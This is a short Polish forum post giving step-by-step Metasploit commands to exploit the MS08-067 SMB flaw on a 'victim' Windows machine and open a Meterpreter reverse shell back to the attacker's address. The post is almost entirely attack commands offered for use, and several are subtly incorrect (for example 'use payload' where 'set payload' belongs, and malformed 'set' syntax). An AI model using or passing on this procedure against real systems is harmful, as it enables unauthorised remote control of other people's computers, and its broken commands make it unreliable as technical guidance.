Pierwsze co musimy zrobić to uruchomić konsole ,a następnie włączyć konsole Metasploit'a:
root@kali:~# msfconsole
Następnie ustalamy narzędzie z jakiego będziemy korzystali:
root@kali:~# use windows/smb/ms08_067_netapi
Teraz ustalamy "PAYLOAD":
root@kali:~# use payload /windows/meterpreter/reverse_tcp
W tym momencie ustalamy adres ip i nieużywany port odbiorcy (nasz) oraz port i adres ofiary:
root@kali:~# set lhost=(nasz adres ip)
root@kali:~# set lport=6666
root@kali:~# set rhost=(adres ip ofiary)
root@kali:~# set rport=(port ofiary)
Następnie rozpoczynamy działanie:
root@kali:~# exploit

Pozdrawiam Max

P.S. Najnowszy Windows 7 jest na to odporny, ale nie wiem jak z Windows'em 10.
P.S. Nie jestem bardzo doświadczony więc jak coś źle napisałem proszę żeby ktoś mnie poprawił